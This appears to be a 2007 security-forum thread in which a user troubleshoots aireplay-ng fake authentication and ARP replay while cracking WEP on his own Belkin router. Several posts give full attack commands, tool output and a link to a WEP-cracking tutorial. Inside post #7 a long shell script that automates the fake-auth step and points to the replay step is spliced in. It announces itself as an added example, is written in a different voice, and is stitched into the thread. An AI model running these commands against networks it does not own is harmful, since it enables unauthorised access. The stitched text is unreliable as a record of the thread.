
Thread: Aireplay Using Fake Auth

  1. #1
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    8

    Default Aireplay Using Fake Auth

    OK, I'm not being daft or stupid, but I would like some help with this.

    I've got a Belkin 802.11g F5D7011 wireless card and a Belkin54g router. I can get monitor mode no problem; I can do an airmon-ng eth1 and it works fine. However, my next step is aireplay-ng -1 0 -e ''myrouter'' -a 00:11:22:33:44:55:66 (MAC of router) -h 00:11:22:33:44:55:66 (MAC of wireless card) eth1, and I still fail to inject packets. Can anyone shed a bit of light on this please? If I can't inject, then it's pointless. Or is there an alternative method of doing this?

    Thanks

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by byt3m3 View Post
    OK, I'm not being daft or stupid, but I would like some help with this.

    I've got a Belkin 802.11g F5D7011 wireless card and a Belkin54g router. I can get monitor mode no problem; I can do an airmon-ng eth1 and it works fine. However, my next step is aireplay-ng -1 0 -e ''myrouter'' -a 00:11:22:33:44:55:66 (MAC of router) -h 00:11:22:33:44:55:66 (MAC of wireless card) eth1, and I still fail to inject packets. Can anyone shed a bit of light on this please? If I can't inject, then it's pointless. Or is there an alternative method of doing this?

    Thanks
    The -1 option in aireplay is to associate and authenticate. This is not just going to magically inject packets for you. First, you should search, as this topic has been covered in masterly detail at least 111 times in this forum, and second, the best way to get an informative response is to post your commands from start to the error so we can see what's going on. We do not have osmosis, and unless you want to give me your IP so I can remotely run your machine for you, I suggest posting as much info as possible.


    POOP IN = POOP OUT

  3. #3
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    And then the chocolate highway opens!!!
    --=Xploitz=-- ®
    Remote-Exploit.org's Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" http://forums.remote-exploit.org/showthread.php?t=8041

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    And then the chocolate highway opens!!!
    I'm just keeping with the anal theme of the day.

  5. #5
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    8

    Default re: aireplay using fake auth

    The steps I've done are as follows:

    airmon-ng stop eth1
    airmon-ng start eth1

    interface chipset monitor mode enabled
    **new shell**
    airodump-ng -c 11 --bssid 00:14:6C:7E:40:80 -w output eth1

    CH 11 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

    BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER  AUTH  ESSID

    00:14:6C:7E:40:80   42  100     5240      0    0  11  54  WEP  WEP           belkin54g

    **new shell**

    aireplay-ng -1 0 -e belkin54g -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 eth1
    (-h 00:0F:B5:88:AC:82 is my card's MAC address)
    then i get
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    and then it's as if it times out, saying failed.
    Reasons could be:
    your MAC address has filtering enabled (which it doesn't)
    your wireless card doesn't support injection (which it DOES)
    you're not near your access point (which I am; it's my router)

    So pretty much I can't really move on from here unless I can get the following.
    Success looks like:

    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful :-)

    **New Shell**
    aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 eth1

    Saving ARP requests in replay_arp-0321-191525.cap
    You should also start airodump-ng to capture replies.

    The following steps have been taken from the BackTrack website's simple WEP crack page; I can't paste the link as I have not submitted enough posts.

    What I have typed here in this reply, the MAC addresses, are copied and pasted into this forum; I have left the MAC addresses according to the link as I don't know mine, but you get what I mean. I am using MY MAC address when I'm actually doing this at home, so again any pointers are appreciated.

  6. #6
    Junior Member
    Join Date
    Oct 2006
    Posts
    33

    Default

    When I'm down the street at a friend's apartment and I've tried to crack the WEP on my access point, I've had some trouble because the signal is weak. Sometimes I have to associate and authenticate multiple times to get it to work. If your AP is just being "picky", the WEP cracking tutorial on the wiki has another type of association you can do that sends keep-alive packets. I've tried this and it worked for me.


    Code:
    aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a "AP Mac" -h "Your Mac" eth1

  7. #7
    Senior Member shamanvirtuel
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Have you locked your card on the AP channel (iwconfig eth0 channel XX)?
    Have you lowered your rate to 1M (iwconfig eth0 rate 1M)?

    These settings are necessary for association (the channel one more than the rate one).
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

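    Pulling the advice in posts #5 to #7 together, here is an added example (not code from the thread, the tutorial, or the aircrack-ng project) as a small POSIX shell wrapper: it locks the card to the AP channel and 1M rate, runs one aireplay-ng -1 0 attempt, and classifies the result by the output lines quoted in this thread instead of eyeballing them. The interface, ESSID, BSSID, client MAC and channel are passed as arguments (an assumed layout), the ESSID is assumed to contain no spaces, the "keep-alive" match is an assumption about aireplay-ng's wording, and the log-file name is made up.

```shell
#!/bin/sh
# Added example, not from the thread or the aircrack-ng project.
# Assumes the aireplay-ng -1 output format quoted in this thread.

# classify_fakeauth: read one aireplay-ng -1 run on stdin, print a verdict.
# Returns 0 = associated, 1 = AP never answered, 2 = unrecognised output.
classify_fakeauth() {
    out=$(cat)
    # grep -c prints 0 and exits 1 on no match; keep the count, ignore the status
    sent=$(printf '%s\n' "$out" | grep -c 'Sending Authentication Request' || true)
    case "$out" in
        *'Association successful'*|*'keep-alive'*)   # keep-alive wording is assumed
            echo "success: associated after $sent auth request(s)"
            return 0 ;;
    esac
    if [ "${sent:-0}" -gt 0 ]; then
        # the symptom in post #5: requests go out, nothing ever comes back
        echo "no-response: $sent auth request(s) sent, AP never answered"
        echo "check: card on AP channel? rate 1M? ESSID/BSSID exact? -h is the card's real MAC?"
        return 1
    fi
    echo "unrecognised aireplay-ng output"
    return 2
}

# fakeauth_cmd IFACE ESSID BSSID CLIENT_MAC [DELAY]
# DELAY 0 (default) = one attempt, the form used in post #5.
# DELAY 6000 = the post #6 variant: re-associate every 6000 s, one packet
# per burst (-o 1), keep-alive every 10 s (-q 10).
fakeauth_cmd() {
    if [ "${5:-0}" -eq 0 ]; then
        printf 'aireplay-ng -1 0 -e %s -a %s -h %s %s' "$2" "$3" "$4" "$1"
    else
        printf 'aireplay-ng -1 %s -o 1 -q 10 -e %s -a %s -h %s %s' "$5" "$2" "$3" "$4" "$1"
    fi
}

# run_fakeauth IFACE ESSID BSSID CLIENT_MAC CHANNEL: the live procedure.
run_fakeauth() {
    iface=$1 essid=$2 bssid=$3 client=$4 chan=$5
    iwconfig "$iface" channel "$chan"   # post #7: lock to the AP channel
    iwconfig "$iface" rate 1M           # post #7: lowest rate, best odds
    log="fakeauth-$(date +%H%M%S).log"  # assumed log name
    eval "$(fakeauth_cmd "$iface" "$essid" "$bssid" "$client" 0)" 2>&1 | tee "$log"
    classify_fakeauth < "$log" || return $?
    # only worth doing once association actually succeeded (post #5, step -3)
    echo "next: aireplay-ng -3 -b $bssid -h $client $iface  (with airodump-ng capturing)"
}

# Live run only when asked: sh fakeauth.sh run eth1 belkin54g <BSSID> <card MAC> 11
if [ "${1:-}" = run ]; then
    shift
    run_fakeauth "$@"
fi
```

    If the verdict is "no-response", the card is sending but the AP is not replying; that is the case where locking the channel and rate (post #7), or switching to the keep-alive form of the command (post #6), is worth trying before blaming injection support.
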
  8. #8
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    8

    Default

    I have tried that method too. I'm going to double-check again when I go home tonight and use the aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a "AP Mac" -h "Your Mac" eth1 command you put and see how it goes. Thanks for the reply.

  9. #9
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by byt3m3 View Post
    I have tried that method too. I'm going to double-check again when I go home tonight and use the aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a "AP Mac" -h "Your Mac" eth1 command you put and see how it goes. Thanks for the reply.
    There is a disclaimer on the aircrack site that says "tough shit", sometimes it won't work.

  10. #10
    Junior Member
    Join Date
    Oct 2006
    Posts
    33

    Default

    No prob, that method worked for me. When it works, instead of saying association successful, it will just continually send keep alive packets every few seconds. Here's a link to the tutorial. It explains things in a lot of detail. Good luck

    aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

